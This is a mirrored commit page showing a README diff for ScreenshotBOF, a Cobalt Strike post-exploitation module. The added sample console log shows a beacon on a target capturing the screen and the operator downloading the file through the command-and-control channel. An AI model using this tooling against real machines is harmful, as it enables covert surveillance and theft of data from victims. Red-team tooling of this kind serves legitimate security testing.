Projects STRLCPY ScreenshotBOF Commits d8fc3deb
🤬
  • ■ ■ ■ ■ ■
    README.md
    skipped 4 lines
    5 5  ## Usage
    6 6  1. import the screenshotBOF.cna script into Cobalt Strike
    7 7  2. use the command screenshot_bof
    8  -3. Download the screenshot from the target e.g.
     8 +3. Download the screenshot from the target
    9 9  ```
    10  -download screenshot.bmp
     10 +beacon> screenshot_bof
     11 +[*] Running screenshot BOF by (@codex_tf2)
     12 +[+] host called home, sent: 3411 bytes
     13 +[+] received output:
     14 +[*] Tasked beacon to printscreen and save to disk
     15 +[+] received output:
     16 +[+] PrintScreen saved to bitmap...
     17 +[+] received output:
     18 +[+] Printscreen bitmap saved to screenshot.bmp
     19 +beacon> download screenshot.bmp
     20 +[*] Tasked beacon to download screenshot.bmp
     21 +[+] host called home, sent: 22 bytes
     22 +[*] started download of C:\screenshot.bmp (12441668 bytes)
     23 +[*] download of screenshot.bmp is complete
    11 24  ```
    12 25   
    13 26  ## Notes
    skipped 9 lines
Please wait...
Page is in error, reload to recover